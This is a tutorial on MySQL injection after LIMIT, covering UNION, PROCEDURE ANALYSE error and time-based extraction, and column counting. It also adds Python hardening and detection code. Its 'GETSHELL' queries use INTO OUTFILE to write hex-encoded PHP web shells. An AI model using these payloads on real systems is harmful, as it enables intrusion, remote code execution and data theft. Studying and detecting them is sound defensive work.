0x01 Without ORDER BY

When the injectable value sits after LIMIT and there is no ORDER BY, a UNION SELECT can be appended directly, for example:

mysql> SELECT 1 from mysql.user limit 0,1 union select 234;
+-----+
| 1   |
+-----+
|   1 |
| 234 |
+-----+
2 rows in set (0.00 sec)

GETSHELL:

mysql> SELECT 1 from mysql.user limit 0,1 union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e from mysql.user into outfile '/tmp/z.php';
Query OK, 2 rows affected (0.00 sec)
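The injection point above exists because request values are spliced straight into ORDER BY and LIMIT. The following is an added example (not code from the original post) showing that application-side pattern beside a hardened form: the table `vinc` is taken from the post; the columns `id`/`name`, the sortable-column whitelist and the numeric bounds are assumptions made for the example.

```python
import re

# Added example, not from the original post. `vinc` is the post's table; the
# columns, the whitelist and the bounds below are constructed for illustration.
ALLOWED_ORDER_COLUMNS = ("id", "name")
MAX_OFFSET = 1_000_000
MAX_ROW_COUNT = 100
_PLAIN_DIGITS = re.compile(r"[0-9]{1,9}")


class InvalidPagination(ValueError):
    """Raised when a sort column or pagination value is not acceptable."""


def build_page_query_unsafe(order_col, limit_expr):
    """The vulnerable pattern: raw request strings concatenated into the
    ORDER BY and LIMIT positions, so anything after the number is executed."""
    return f"SELECT id, name FROM vinc ORDER BY {order_col} LIMIT {limit_expr}"


def parse_bounded_int(value, upper):
    """Accept only an unsigned decimal string (no sign, spaces or trailing
    tokens) and enforce an upper bound; everything else is rejected."""
    if not isinstance(value, str) or not _PLAIN_DIGITS.fullmatch(value):
        raise InvalidPagination(f"not a plain integer: {value!r}")
    n = int(value)
    if n > upper:
        raise InvalidPagination(f"out of range: {n}")
    return n


def build_page_query_safe(order_col, offset, row_count):
    """Hardened form: the sort column comes from a fixed whitelist and the
    LIMIT operands are validated integers, so no SQL from the request can
    reach the statement text."""
    if order_col not in ALLOWED_ORDER_COLUMNS:
        raise InvalidPagination(f"column not sortable: {order_col!r}")
    off = parse_bounded_int(offset, MAX_OFFSET)
    cnt = parse_bounded_int(row_count, MAX_ROW_COUNT)
    return f"SELECT id, name FROM vinc ORDER BY {order_col} LIMIT {off}, {cnt}"


def rejects(order_col, offset, row_count):
    """True when the hardened builder refuses the given request values."""
    try:
        build_page_query_safe(order_col, offset, row_count)
    except InvalidPagination:
        return True
    return False


if __name__ == "__main__":
    # The post's payload passes straight through the unsafe builder ...
    print(build_page_query_unsafe("id", "0,1 union select 234"))
    # ... and is refused by the hardened one.
    print(rejects("id", "0", "1 union select 234"))
    print(build_page_query_safe("id", "0", "10"))
```

Formatting the integers into the string is safe only because they were parsed from a strict digit pattern first; with server-side prepared statements MySQL also accepts `LIMIT ?, ?` placeholders, which is the preferable route when the driver supports them.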

0x02 With ORDER BY

A UNION cannot follow an ORDER BY clause, as shown below:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 union select 234;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

Instead we can use PROCEDURE ANALYSE, which analyses the result of a SELECT and suggests an optimal column type for each column of the queried table; its argument list is evaluated after LIMIT.

When error messages are returned to the client (error-based):

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.1.73-log'

When error messages are not returned, use a time-based approach:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(50000000,SHA1(1)),1))))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'

Note that sleep() cannot be used here; only benchmark() works.

GETSHELL:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 into outfile '/tmp/2.php' LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E;
Query OK, 1 row affected (0.00 sec)

0x03 Obtaining the column count

Let's look at what else may follow LIMIT in the SELECT syntax:

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

Here we see that INTO var_name [, var_name] is permitted after LIMIT. Selecting into a list of user variables makes the server raise an error when the variable count does not match the column count, which both confirms that the injection point exists and reveals the number of columns. It is used as follows:

mysql> select * from vinc order by id limit 1 into @,@;
Query OK, 1 row affected (0.00 sec)

mysql> select * from vinc order by id limit 1 into @,@,@;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
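From the defender's side, every technique in sections 0x01 to 0x03 leaves a recognisable trace either in the statement text (general query log, proxy or ORM logging) or in the server error the application receives. The following is an added example, not part of the original post: a small Python scanner with signatures for UNION after LIMIT, PROCEDURE ANALYSE, INTO OUTFILE/DUMPFILE, bare INTO @ variable lists, extractvalue/updatexml probes and BENCHMARK delays, plus a classifier for the error codes shown above (1221, 1222, and 1105 with an XPATH message). The sample statements and error lines are constructed for the example; the regexes are signatures, not a SQL parser.

```python
import re

# Added detection example; rule set and sample lines are constructed here and
# are not part of the original post.

# Strip ordinary /* */ comments but keep /*! */ version comments, which MySQL
# executes and which an attacker could otherwise hide keywords in.
_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)
_WS = re.compile(r"\s+")


def normalise(stmt):
    """Lower-case, drop plain comments and collapse whitespace so the rules are
    not evaded by case or comment padding (hex literals are left untouched)."""
    stmt = _COMMENT.sub(" ", stmt)
    return _WS.sub(" ", stmt).strip().lower()


# Signatures for the post-LIMIT techniques described in sections 0x01 to 0x03.
RULES = {
    "union_after_limit":   re.compile(r"\blimit\b[^;]*?\bunion\b"),
    "procedure_analyse":   re.compile(r"\bprocedure\s+analyse\s*\("),
    "xpath_error_probe":   re.compile(r"\b(extractvalue|updatexml)\s*\("),
    "benchmark_delay":     re.compile(r"\bbenchmark\s*\(\s*\d+"),
    "into_outfile":        re.compile(r"\binto\s+(outfile|dumpfile)\b"),
    # `INTO @,@` style lists: nameless user variables, unlike a legitimate INTO @total
    "into_bare_user_vars": re.compile(r"\binto\s+@(\s*,\s*@)*\s*(;|$)"),
}


def scan_statement(stmt):
    """Return the names of all rules that match one statement."""
    s = normalise(stmt)
    return [name for name, rx in RULES.items() if rx.search(s)]


def scan_statements(stmts):
    """Scan a list of statements; result is aligned with the input."""
    return [scan_statement(s) for s in stmts]


# Server errors the probes provoke. 1105 is a generic error code, so the
# XPATH message text is required before it is treated as a signal.
_ERROR = re.compile(r"ERROR (\d+) \([A-Z0-9]+\): (.*)")


def classify_error(line):
    m = _ERROR.search(line)
    if not m:
        return None
    code, msg = m.group(1), m.group(2)
    if code == "1221":
        return "union_after_order_by"
    if code == "1222":
        return "column_count_probe"
    if code == "1105" and "XPATH syntax error" in msg:
        return "xpath_error_extraction"
    return None


# Constructed sample statements: two benign, then one per technique.
SAMPLE_STATEMENTS = [
    "SELECT id, name FROM vinc ORDER BY id LIMIT 0, 10",
    "SELECT COUNT(*) FROM vinc INTO @total",
    "SELECT 1 from mysql.user limit 0,1 union select 234",
    "SELECT 1 from mysql.user order by 1 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)",
    "SELECT 1 from mysql.user order by 1 limit 0,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(50000000,SHA1(1)),1))))),1)",
    "SELECT 1 from mysql.user order by 1 limit 0,1 into outfile '/tmp/x.php'",
    "select * from vinc order by id limit 1 into @,@,@",
]

# Constructed sample error lines in the mysql client's format.
SAMPLE_ERROR_LINES = [
    "ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY",
    "ERROR 1222 (21000): The used SELECT statements have a different number of columns",
    "ERROR 1105 (HY000): XPATH syntax error: ':5.1.73-log'",
    "ERROR 1064 (42000): You have an error in your SQL syntax",
]

if __name__ == "__main__":
    for stmt, hits in zip(SAMPLE_STATEMENTS, scan_statements(SAMPLE_STATEMENTS)):
        print(hits or "-", stmt[:70])
    for line in SAMPLE_ERROR_LINES:
        print(classify_error(line), "<-", line)
```

Error 1222 and 1221 also occur when developers simply write a bad query, so treat a hit as a signal to correlate with the application's expected statement shapes and request parameters rather than as proof on its own; the statement rules are the stronger indicator, since none of these constructs belong in a normal paginated query.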